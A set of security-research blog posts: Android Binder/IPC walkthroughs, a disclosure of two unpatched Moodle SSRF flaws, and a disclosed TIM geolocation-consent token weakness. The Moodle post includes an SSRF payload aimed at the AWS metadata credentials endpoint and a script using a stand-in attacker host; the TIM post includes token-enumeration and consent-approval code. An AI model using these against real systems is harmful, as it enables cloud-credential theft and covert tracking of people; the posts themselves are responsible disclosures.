When the service handler returns, the execution flow comes back to the `binder_parse()` function (in the BR_TRANSACTION switch case) with the reply packet and the result value of the servicemanager handler. Looking at binder_transaction_data.flags: if TF_ONE_WAY is set, the call is asynchronous and the Binder does not expect a reply, so the servicemanager just tells the Binder to free binder_transaction_data.data.ptr.buffer with a BC_FREE_BUFFER command (internally using the binder_free_buffer() function). If it is not an asynchronous call, the reply is sent back to the Binder using binder_send_reply(), which issues a BC_REPLY command.

Also, as you may have noticed, all these functions (binder_send_reply, binder_free_buffer, ...) are meant to be easy to call from the rest of the code, and they perform all the setup needed to interact with the Binder via the final ioctl(). Let's take a simple example with the binder_free_buffer() mentioned before.

void binder_free_buffer(struct binder_state *bs,
                                   binder_uintptr_t buffer_to_free)
{
    struct {
        uint32_t cmd_free;
        binder_uintptr_t buffer;
    } __attribute__((packed)) data;

    data.cmd_free = BC_FREE_BUFFER;
    data.buffer = buffer_to_free;
    binder_write(bs, &data, sizeof(data));
}

This function, used by the servicemanager handler to tell the Binder to free a buffer, sets up a small data structure containing cmd_free set to BC_FREE_BUFFER and the buffer to free, then calls binder_write(). binder_write() is the final function that puts the received input into binder_write_read.write_buffer before ioctl()ing the Binder with the BINDER_WRITE_READ command:

int binder_write(struct binder_state *bs, void *data, size_t len)
{
    struct binder_write_read bwr;
    int res;

    bwr.write_size = len;
    bwr.write_consumed = 0;
    bwr.write_buffer = (uintptr_t) data;
    bwr.read_size = 0;
    bwr.read_consumed = 0;
    bwr.read_buffer = 0;
    res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr);
    if (res < 0) {
        fprintf(stderr,"binder_write: ioctl failed (%s)\n",
        strerror(errno));
    }
    return res;
}

Note the difference in how the binder_write_read structure is used now compared to before.
When we were expecting an action from the Binder (in binder_loop), the received action was inside the read_buffer (which contains the BR_* command). Now the Binder needs to perform an action based on our input, so we use the write_buffer (with a BC_* command).

That said, we can come back to binder_send_reply(), which is responsible for sending the reply of the performed actions to the Binder. This is the source code:

void binder_send_reply(struct binder_state *bs,
                                   struct binder_io *reply,
                                   binder_uintptr_t buffer_to_free,
                                   int status)
{
    struct {
        uint32_t cmd_free;
        binder_uintptr_t buffer;
        uint32_t cmd_reply;
        struct binder_transaction_data txn;
    } __attribute__((packed)) data;

    data.cmd_free = BC_FREE_BUFFER;
    data.buffer = buffer_to_free;
    data.cmd_reply = BC_REPLY;
    data.txn.target.ptr = 0;
    data.txn.cookie = 0;
    data.txn.code = 0;
    if (status) {
        // the svcmgr_handler return -1
        data.txn.flags = TF_STATUS_CODE;
        data.txn.data_size = sizeof(int);
        data.txn.offsets_size = 0;
        data.txn.data.ptr.buffer = (uintptr_t)&status;
        data.txn.data.ptr.offsets = 0;
    } else {
        // the svcmgr_handler return 0
        data.txn.flags = 0;
        data.txn.data_size = reply->data - reply->data0;
        data.txn.offsets_size = ((char*) reply->offs) - ((char*) reply->offs0);
        data.txn.data.ptr.buffer = (uintptr_t)reply->data0;
        data.txn.data.ptr.offsets = (uintptr_t)reply->offs0;
    }
    binder_write(bs, &data, sizeof(data));
}

Note the declared data structure: it contains an integer cmd_free (which will be BC_FREE_BUFFER), the buffer, cmd_reply (which will be BC_REPLY) and a binder_transaction_data structure.
The buffer to free is binder_transaction_data.data.ptr.buffer (previously cast into a binder_io; it contains the 'parameters', for example a service name for the servicemanager), and then the structure is filled based on the status value.
The status value is the return value of the servicemanager handler (svcmgr_handler): 0 if everything went fine (and the reply was filled), or -1 if something went wrong.
If the result is -1, this value is copied into data.txn.data.ptr.buffer (that is, inside the binder_transaction_data of the data structure).
If the result of the servicemanager handler was fine (0), the binder_transaction_data is filled with the reply's data/offset buffers and passed to the binder_write() function, which, as explained before, takes the data structure and puts it into binder_write_read.write_buffer before calling ioctl() with the BINDER_WRITE_READ command.

Quick recap

The servicemanager is started by the init process (as defined in /init.rc) and, first of all, becomes the context manager for the Binder. It then notifies the Binder that it is entering an infinite loop (BC_ENTER_LOOPER) and starts reading and parsing the operations delivered by the Binder. When such events are related to service lookup or service registration (SVC_MGR_GET_SERVICE and SVC_MGR_ADD_SERVICE), the Binder sends the servicemanager a BR_TRANSACTION with one of these commands inside its binder_transaction_data structure. The servicemanager checks that the caller process has the necessary rights (using information sent by the Binder) and, in the case of a service lookup, returns a handle to the Binder. When it is done, the reply is sent to the Binder using ioctl with BINDER_WRITE_READ, with the reply inside the write_buffer and the BC_REPLY command.

Conclusions

In this post we concentrated on the transactions between the Binder and the servicemanager, a crucial component for IPC. In the following blog post, we will dig into the client and service perspective of IPC transactions.

(Alessandro Groppo)

Multiple SSRF on Vanilla Moodle Installations

During the time dedicated to research, we found two Server-Side Request Forgery vulnerabilities in Moodle. The first one is a blind SSRF already discovered in 2018 and tracked as CVE-2018-1042, which never received a proper patch; the other is a fresh SSRF in the parsing of image tags inside the same component (the File Picker).

They are currently unpatched and both work on the latest Moodle version, because the Moodle team, as they stated over email, leaves the responsibility of protecting network interactions to system administrators. I personally do not agree with this position, because it leaves a dangerous vulnerability in a vanilla installation that can lead to critical scenarios, especially on cloud-based hosting. So, in order to protect your Moodle installation, check out the Workaround section at the end of the article.

Let's dig into these vulnerabilities, starting from the impacted component, the File Picker.

File Picker

The File Picker is a core Moodle component used to handle file uploads for multiple purposes. For example, it is used to handle the user's profile picture, or in 'Private Files', a dedicated area available to any authenticated user. You can easily upload a file, but also retrieve an image from an arbitrary URL(!).

As it is used for multiple purposes, it is accessible by default to any authenticated user (including low-privileged ones).

The fresh SSRF

The vulnerability resides in the parsing of images fetched from an arbitrary URL (when a user chooses to retrieve an image by URL, as mentioned before).
If you request an HTML page, Moodle fetches all the '<img>' tags inside it and asks you to choose which image you want to download. It extracts the src attribute of every image tag in the page and downloads the image directly, without further checks. That means that if we point it at a server we control, we can serve an HTML page with an arbitrary URL inside an image tag, and Moodle will perform that arbitrary request for us. Then we can save the fake image (which contains the response of the SSRF) and display its result.

PoC

[screenshot]

From the 'URL Downloader' action inside the File Picker, we can supply a URL to our server pointing to /index.html, which contains the following payload:

<img src=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance>

The request picks up our 'src' attribute as follows:

[screenshot]

 

That will result, in the UI, in the following selection:

[screenshot]

We can click on the box, and choose to download the fetched ‘image’:

[screenshot]

In order to download the response, we have to provide a custom extension in the title name and customize the accepted_types[] parameter accordingly (for example .arbitraryExtension):

[screenshot]

 

The returned JSON response contains the path to the result file (holding the arbitrary request's response), which we can download with a GET request:

[screenshot]

 

By automating this whole process with an exploit, we can now easily interact with local services.

For example, on an AWS EC2 instance we can interact with the instance metadata and user data API at the internal endpoint 169.254.169.254 (you can find more about this API in the AWS documentation).
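
A rough Python sketch of automating the whole flow follows. The endpoint and parameter names are hypothetical placeholders (the real ones are visible in the screenshots and in the published exploits); only the overall logic is illustrated:

import requests

MOODLE = "https://moodle.example"
SESSION = {"MoodleSession": "XXXX"}     # authenticated (low-privilege) session
SESSKEY = "XXXX"                        # per-session key used by Moodle forms
ATTACKER = "http://attacker.example"    # serves index.html with the <img> payload

s = requests.Session()
s.cookies.update(SESSION)

# 1. Ask the File Picker's URL downloader to fetch our HTML page (hypothetical route)
s.post(f"{MOODLE}/repository/repository_ajax.php",
       params={"action": "list"},
       data={"repo_id": 6, "file": f"{ATTACKER}/index.html", "sesskey": SESSKEY})

# 2. Download the <img> target (the SSRF response) as a fake image, forcing an
#    arbitrary extension so the file is accepted
resp = s.post(f"{MOODLE}/repository/repository_ajax.php",
              params={"action": "download"},
              data={"repo_id": 6, "title": "loot.arbitraryExtension",
                    "accepted_types[]": ".arbitraryExtension", "sesskey": SESSKEY})

# 3. The JSON response contains the draft file URL holding the SSRF response
print(resp.json())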

[screenshots]

The old Blind SSRF

The unpatched blind SSRF vulnerability (CVE-2018-1042) was already described here: exploit-db/exploits/47177. The patch did not actually fix it, so it is still exploitable and is better suited for internal port scanning (as it is blind):

[screenshot]

You can find both exploits in the Reference section.

Conclusion and Workaround

As we said, these SSRFs currently work on the latest Moodle release, and their impact can be quite critical for cloud-based instances. Moodle has had an open issue since 2016 (MDL-56873) that plans to cover the most common restriction scenarios.

To mitigate these issues, from 'Site Administration > Security > HTTP Security' it is possible to restrict the allowed hosts and ports ('cURL blocked hosts' and 'cURL allowed ports'). You can customize these settings based on your environment (for example blocking the loopback and the internal network, and allowing only HTTP ports to prevent port scans against external targets too).

Video

Timeline:

02/02/2020 - Moodle contacted
03/02/2020 - They acknowledged the report and opened a case
06/02/2020 - Blind SSRF vulnerability rejected (System Administrators should fix it)
11/03/2020 - We replied to some questions
25/03/2020 - The second SSRF vulnerability was also rejected (System Administrators should fix it)
25/03/2020 - Tried to emphasize the risk
30/03/2020 - Issues closed without a fix

(Alessandro Groppo)

Android IPC: Part 1 - Introduction

Introduction

Over the last few months I have been studying Android internals in order to perform some security research in the future. I first focused on its architecture and fundamental components, from the bootloader stage up to the Framework, in order to get an initial high-level picture. Then I focused on the Binder component, for two reasons:

  • It is one of the main Android components, vital for its functionality, as it is the IPC core.
  • Around that time, Google Project Zero discovered a 0-day exploited in the wild as part of a chain to compromise the Android system. The Binder was the impacted component, allowing LPE to root even from an isolated process (which means it is definitely a good attack vector).

During this study process I took a lot of messy notes, so after a month or two of not working on Android anymore, I picked them up again, put them in order, studied some more (adding more messy notes) and decided to write this little series of articles. The second and third parts in particular contain theoretical concepts, high-level functionality and a lot of source code references. Parts of these articles can be considered a 'code walkthrough', so having the actual Android source code at hand (the online Android repository is enough) is highly recommended to follow the flow.
I didn't want to repost other people's work, so this 'code walkthrough' is something different, something that honestly would have helped me when I was starting out, and I hope it can help others too. It may not be perfect, so feel free to point anything out at <alessandro [at] hacktivesecurity.com> and I will of course consider it.
By the way, all references are at the bottom of each article.

In this first part, I will introduce some basic Android concepts that will be useful for the next chapters. The second part digs into Binder interactions and the servicemanager. And last, but not least, the third covers the client and service IPC implementation and usage.

IPC Introduction

Inter-Process Communication is a necessary and indispensable feature of every operating system, letting processes communicate with each other. That means that if process A needs to communicate with process B (to synchronize, share data, and so on), the OS must provide the capabilities to do so.
There are multiple solutions depending on the underlying OS: pipes, sockets, shared files, shared memory and more. These implementations are out of the scope of this article series, so here are some well-written references:

Linux: https://www.geeksforgeeks.org/inter-process-communication-ipc/
OSX: https://developer.apple.com/documentation/uikit/inter-process_communication
Windows: https://docs.microsoft.com/en-us/windows/win32/ipc/interprocess-communications

Before going over the IPC implementation in Android, let's make a short introduction to Android functionality and some security aspects that will be useful during the reading.

Android and Linux

Starting with the classics: Android is a Linux-kernel-based distribution aimed at mobile devices. I cannot explain it better than it was explained in 'Android Internals' by Jonathan Levin:

“Android's novelty arises from what it aims to provide - not just another Linux distribution - but a full software stack. The term "stack" implies several layers. Android provides not just the basic kernel and shell binaries, but also a self-contained GUI environment, and a rich set of frameworks. Coupled with a simple to use development language - Java - Android gives developers a true Rapid Application Development (RAD) environment, as they can draw on prewritten, well-tested code in the frameworks to access advanced functionality - such as Cameras, motion sensors, GUI Widgets and more - in a few lines of code”

One of the biggest differences from Linux is Bionic as its core C runtime library, instead of the standard GNU libc (glibc). Bionic is lighter and more focused on Android's needs. There are a lot of differences between them, but since today we are focused on IPC, the one of interest is the omission of System V IPC (message queues, shared memory and semaphores), left out because Android chose its own IPC mechanism, the Binder. The Binder is a kernel component, the core component of IPC, that enables different processes to communicate with each other using a client-server architecture. It is the core theme of this series, so we will dig into it in later chapters.

Dalvik and ART

Just to be aligned, let’s spend some words about the Dalvik Virtual Machine and ART, which are the core of Android.
If you know how Java works, you also know that in order to execute code you need the JVM (Java Virtual Machine), which executes the compiled bytecode, translating it to machine code.
Well, Dalvik follows the same concept, but it's not the same!
The Dalvik VM runs a different type of bytecode, called DEX (Dalvik Executable), which is optimized for efficiency in order to run faster on the low-performance hardware typical of mobile devices. It is a Just-In-Time (JIT) compiler, which means the code is compiled dynamically when it needs to be executed.
The Android Runtime (ART) serves the same purpose: translating bytecode to machine code and executing it.
However, it takes a different approach: instead of JIT compilation it uses Ahead-Of-Time (AOT) compilation, which translates the whole DEX into machine code (dex2oat) at installation time or when the device is idle. That makes it much faster at execution time, but it also requires more storage space.

Dalvik is the predecessor of ART. ART was introduced in Android 4.4 (KitKat) and has used a hybrid combination of AOT and JIT since Android 7.0 (Nougat), following a different compilation approach. In summary:

  1. The first few times the application runs, it is executed through JIT compilation.
  2. When the device is idle or charging, a daemon performs AOT compilation of the frequently used code, based on a compilation profile generated during the first runs.

You can find these profiles for each installed application inside /data/dalvik-cache/profiles/:

[screenshot]

Android Framework and abstraction

Developers can access complex functionality with a few lines of code by using pre-written code that resides in the Framework, delivered in packages such as android.*. These packages cover different scopes, such as location and application support (android.location and android.app), networking (android.net) and, of interest to us, IPC support and core OS services in android.os (see https://developer.android.com/reference/packages.html for more).
This is a big advantage from the security perspective. Usually developers do not have to bother with native languages (avoiding common memory corruption issues) and can rely on well-tested code; even when they need advanced or low-level functionality (such as accessing a hardware peripheral), they can stay in a high-level, memory-safe language.

Let's take a quick example of how to interact with the WiFi component, supposing we need to retrieve the current WiFi state:

import android.content.Context;
import android.net.wifi.WifiManager;
// Get a handle to the WiFi service
[..]
WifiManager wifiManager = (WifiManager) getApplicationContext().getSystemService(Context.WIFI_SERVICE);
// Get the WiFi state
wifiManager.getWifiState();
[...]

With these two lines of code we have completed our task:

  1. Get a handle to the WiFi service. The return value of getSystemService() is a generic Object (the handle to the service) that needs to be cast based on the desired service.
  2. From the retrieved manager, we can directly call the desired function, which performs an IPC call and returns the result.

That's how Android abstracts service interactions, enhancing security by simplifying application code.

However, sometimes, also for performance reasons, there is a need to run native code inside an application. This is done using JNI, which permits calling native functions from a shared library in the application context. This is pretty common for messaging applications (for example, WhatsApp uses PJSIP, a C library, for video calls).

Java Native Interface

As we said, sometimes there is a need to use native code such as C/C++ from standard applications. This is possible through the JNI (Java Native Interface), which lets Java call native functions almost as if they were regular methods. The native code is shipped in shared libraries inside the lib/ folder of the APK, which contains binaries compiled for multiple architectures (32/64-bit ARM, x86/x86-64), and the underlying system will choose the appropriate one based on its hardware.
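A quick way to see which ABIs an APK ships native code for is to list the lib/ entries directly from the archive. A minimal sketch (the APK path is just a placeholder):

import sys
import zipfile
from collections import defaultdict

def list_native_libs(apk_path):
    # Group native libraries by ABI: entries look like lib/<abi>/<name>.so
    libs = defaultdict(list)
    with zipfile.ZipFile(apk_path) as apk:
        for entry in apk.namelist():
            parts = entry.split("/")
            if len(parts) == 3 and parts[0] == "lib" and entry.endswith(".so"):
                libs[parts[1]].append(parts[2])
    return libs

if __name__ == "__main__":
    # Usage: python list_abis.py some_app.apk
    for abi, names in list_native_libs(sys.argv[1]).items():
        print(f"{abi}: {len(names)} shared libraries")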

Let’s take an example with Whatsapp:

undefined

In this case, inside the lib/ folder there is only the armeabi-v7a directory. That’s because my test device is a 32-bit ARM (https://developer.android.com/ndk/guides/abis) and the system saves physical space by removing unused binaries compiled for other platforms.
These native functions are interesting from a security perspective because they can include memory corruption issues.
In order to track native calls, we can search through the Java code (decompiled) for native declarations:

undefined

That’s how a native function is declared, with the native keyword, and later called as if it were a normal Java function.
If you want to extract exported symbols from shared libraries, the nm utility can come in handy (running nm -D * | grep <func_name> inside the specific ABI folder can be enough).
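A minimal sketch of such a search over the decompiled sources (the directory path is a placeholder and the regex is intentionally loose):

import re
import sys
from pathlib import Path

# Loose match for JNI declarations such as:
#   public native String stringFromJNI();
NATIVE_DECL = re.compile(r"\bnative\b[^;{]*\(")

def find_native_declarations(src_dir):
    # Yield (file, line number, line) for every 'native' method declaration.
    for path in Path(src_dir).rglob("*.java"):
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if NATIVE_DECL.search(line):
                yield path, lineno, line.strip()

if __name__ == "__main__":
    for path, lineno, line in find_native_declarations(sys.argv[1]):
        print(f"{path}:{lineno}: {line}")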

If you find an exploitable memory corruption in an application, you also have to consider the application sandbox. If you successfully compromise an application through remote code execution, you are confined to its sandbox, where you can interact only with the application’s own files and functionality (and its declared Android permissions). Of course, this can be part of a chain: with a foothold inside the system you have a larger attack surface to elevate privileges and compromise the device.

Application Sandbox

CVE-2019-11932 is a WhatsApp remote code execution caused by a memory corruption while handling GIF animations (here is a demo PoC: https://www.youtube.com/watch?v=loCq8OTZEGI). This was a critical issue because, even from inside the sandbox, you can access all WhatsApp files (chat databases, backups, media, ..) and, as we know, WhatsApp is nowadays one of the main messaging applications.
As we said, Android is a Linux-based OS and inherits many of its concepts. In particular, Android enforces a kernel-level application sandbox based on UIDs (user IDs): every application has its own UID and GID, used for file permissions and for its running process (application UIDs start from 10000). Each application has a dedicated workspace in /data/data/<package_name>, created at installation time, whose permissions allow only the application’s own user to read and write those files:

undefined

As you can see, only the user u0_a106 (10106, the UID of the WhatsApp application on my device) can access these files, meaning that no other application can read their content (only that user and root).
For some applications (like browsers) there is an additional isolation level that literally ‘isolates’ a process by running it under a dedicated UID. These IDs are referred to in the AOSP source code as AID_ISOLATED_START (99000) and AID_ISOLATED_END (99999), and they limit which services the process can interact with. For example, the following snippet is part of the servicemanager and is used to obtain a handle to a service:

frameworks/native/cmds/servicemanager/service_manager.c

uint32_t do_find_service(const uint16_t *s, size_t len, uid_t uid, pid_t spid)
{
    // find_svc retrieves the service info structure
    struct svcinfo *si = find_svc(s, len);
    /* ... */
    // Check whether the requested service allows interaction from isolated apps
    if (!si->allow_isolated) {
        // If this service doesn't allow access from isolated processes,
        // then check the uid to see if it is isolated.
        uid_t appid = uid % AID_USER;
        if (appid >= AID_ISOLATED_START && appid <= AID_ISOLATED_END) {
            return 0;
        }
    }
    /* ... */
    return si->handle;
}

We will go deeper into the full process of obtaining a service handle in the next chapters, but from this snippet you can already see where the isolation check is performed. The svcinfo structure (which holds service information such as the name, the isolation policy and more) is checked, and if the target service does not allow calls from isolated processes and the caller’s app ID falls between AID_ISOLATED_START and AID_ISOLATED_END, the service handle is not returned.
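The same check can be summarized in a few lines (a sketch that simply reproduces the logic above, using the constants from the servicemanager snippet):

# Constants as used in the servicemanager snippet above
AID_USER = 100000            # offset between Android users
AID_ISOLATED_START = 99000   # first UID reserved for isolated processes
AID_ISOLATED_END = 99999     # last UID reserved for isolated processes

def is_isolated(uid):
    # Strip the Android user offset and check the isolated range.
    appid = uid % AID_USER
    return AID_ISOLATED_START <= appid <= AID_ISOLATED_END

print(is_isolated(99008))    # True: Chrome's isolated process shown below
print(is_isolated(10106))    # False: WhatsApp's UID from the previous example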

For example, this is the chrome browser inside an isolated process:

undefined

Note that the user ID is 99008, which falls in the 99000-99999 range, meaning it is an isolated application process.

Conclusion

In this first article, we introduced basic Android concepts and security aspects that will come in handy in the next chapters. In the next article, we are going to talk about the Binder, its transactions and the servicemanager.

References

http://newandroidbook.com/
https://source.android.com/devices/tech/dalvik
https://source.android.com/security/app-sandbox

(Alessandro Groppo)

A true story of mobile device geolocation

TL;DR

During our monthly research activity, and in accordance with the relevant Responsible Disclosure program, we found and investigated an interesting security issue allowing the geolocation of mobile devices on TIM, an Italian telecommunications provider. A malicious user could obtain a TIM customer’s geo-position by forcing the approval mechanism that is supposed to authorize location tracking. Thanks to TIM and its Responsible Disclosure program, which has allowed researchers to ethically disclose findings since 2018.

The research focused on the TerminalLocation API service provided by TIM on its API Store.
TerminalLocation allows retrieving the location of arbitrary devices by their phone number.
Below is the service description provided by TIM:

“With TIM API - TerminalLocation track and monitor the location of mobile devices using geographic coordinates (latitude and longitude), date and time. Location information are valid for TIM customers.“

Let's see how it works.

Overview of the service

In order to use the API service, we needed to sign up and then create a test application to retrieve an API key.
Then, you can make a GET request to /try/location/v1.1/<PHONE_NUMBER>, including the API key in a request header. If this is the first request targeting that phone number, an SMS is sent to it asking for authorization to report its current position at any time.
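In practice the call boils down to something like the following sketch (the API host and the header name carrying the key are placeholders, not the real values):

import requests

API_BASE = "https://<TIM_API_HOST>"   # placeholder: actual API endpoint host
API_KEY = "<YOUR_API_KEY>"            # key obtained from the test application

def locate(phone_number):
    # Ask TerminalLocation for the device position; the header name is assumed.
    resp = requests.get(f"{API_BASE}/try/location/v1.1/{phone_number}",
                        headers={"X-Api-Key": API_KEY})
    return resp.status_code, resp.text

print(locate("+39333XXXXXXX"))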

 

undefined

In order to accept being geolocated, the user has to click the link in the message, which contains a base64-encoded user token, and then click the confirmation button.

undefined

This action triggers a GET request to /tim/api/unsecured/consenso/<user-token>.
Everything seems fine: users have to give their consent before the service can track them. Or almost...

Vulnerability

We started collecting multiple tokens and were surprised by their low entropy.
The base64 string sent within the link hides a 24-character token made of both static and, at first glance, random values. Breaking up some tokens obtained within the same day, a few hours apart, we noticed the following pattern:
XXXX AAAA YYYYYYYYYYYYYYY D
XXXX BBBB YYYYYYYYYYYYYYY E
XXXX CCCC YYYYYYYYYYYYYYY F
(next day)
XXXX GGGG ZZZZZZZZZZZZZZZ H

The schema may be decoded as follows:
First part: the 4 Xs are always the same; they are probably a static value
Second part: the 4 As, Bs, Cs and Gs look like random characters
Third part: the 15 Ys and Zs are constant within a day but change day by day; they may be related to the current date
Fourth part: the D, E, F and H look like random characters

We confirmed that these tokens are not randomly generated and that there is a pretty simple logic behind them.

The crucial test consisted of requesting 2 tokens within a very short period of time (2 seconds):
XXXX XXDD YYYYYYYYYYYYYYY A
XXXX XXFF YYYYYYYYYYYYYYY B

Bingo!
They differ by just 3 characters and they are incremental!
At this point we could guess with more confidence how tokens are generated: the first 4 characters are always the same, the next 4 characters are probably related to a timestamp (they are consecutive), then come 15 characters related to the current day, and finally 1 random character in the last position.
With this insight we could build an enumeration tool, but another key point was reducing the character set:
A request with a syntactically correct token returns an error message containing “agreement not found":

undefined

With a malformed token (invalid length or invalid character set) it says Invalid parameters:

undefined

After a few fuzzing requests we determined that all characters are hexadecimal, which greatly reduces the enumeration space (16 possible values per character instead of the 36 of the full lowercase alphabet plus digits).

Exploitation

The exploitation was pretty straightforward:

  • Request a token for our own phone number and receive it via SMS
  • Request a second token, for the victim, a few seconds later
  • Deduce the victim’s token from ours
  • Locate the phone!

To automate this process, we wrote a few lines of Python.
First, we request two tokens with a two-second delay (the first token is sent to us and the second to the victim).
The timing is crucial because of the consecutive, timestamp-like logic behind the tokens.

undefined

Attacker’s token:

undefined

Now we have the token generated right before the victim’s one, and we can easily predict the victim’s token by enumerating the 2 characters starting at the 6th position plus the last character.
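The core of the enumeration can be sketched in a few lines (the original script is the one shown in the screenshots; here the host, the base64 handling of the token in the URL and the exact positions of the variable characters are assumptions based on the observations above):

import base64
import itertools
import requests

API_BASE = "https://<TIM_API_HOST>"   # placeholder: actual API endpoint host
HEX = "0123456789abcdef"              # charset confirmed by the fuzzing step

def candidate_tokens(attacker_token):
    # Assumption: only the two characters right after the first six and the
    # final character differ between two tokens generated seconds apart.
    for a, b, last in itertools.product(HEX, repeat=3):
        yield attacker_token[:6] + a + b + attacker_token[8:23] + last

def is_victim_token(token):
    # Assumption: the consent endpoint takes the base64-encoded token (as in
    # the SMS link) and answers "agreement not found" for wrong candidates.
    encoded = base64.b64encode(token.encode()).decode()
    resp = requests.get(f"{API_BASE}/tim/api/unsecured/consenso/{encoded}")
    return "agreement not found" not in resp.text.lower()

attacker_token = "<our 24-character token>"   # received via our own SMS
victim_token = next(t for t in candidate_tokens(attacker_token) if is_victim_token(t))
print("Victim token:", victim_token)

With the hexadecimal charset this is only 16^3 = 4,096 candidates, which is why the multi-threaded version finishes in well under a second.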

undefined

Thanks to multi-threading and, of course, low entropy, this enumeration took less than 1 second to retrieve the victim’s token.
With that token, we can now accept the agreement with a PUT request to /tim/api/unsecured/consenso/<token>?operazione=APPROVA and geolocate the victim’s phone:

undefined

undefined
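For completeness, the final consent approval can be scripted in the same way (again a sketch; the host is a placeholder and the base64 handling of the token in the URL is an assumption):

import base64
import requests

API_BASE = "https://<TIM_API_HOST>"   # placeholder: actual API endpoint host

def approve(token):
    # Accept the agreement on the victim's behalf using the recovered token.
    encoded = base64.b64encode(token.encode()).decode()
    return requests.put(f"{API_BASE}/tim/api/unsecured/consenso/{encoded}",
                        params={"operazione": "APPROVA"})

print(approve("<recovered 24-character token>").status_code)

Once the consent is approved, the location request shown at the beginning of the article returns the victim’s coordinates.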

Responsible Disclosure:

14/08/2019 - Vulnerability found / Vendor contact
14/08/2019 - Automatic response
27/08/2019 - Vulnerability acknowledged
25/10/2019 - Fixed release planned for the end of November
03/12/2019 - Fix released

(Alessandro Groppo)
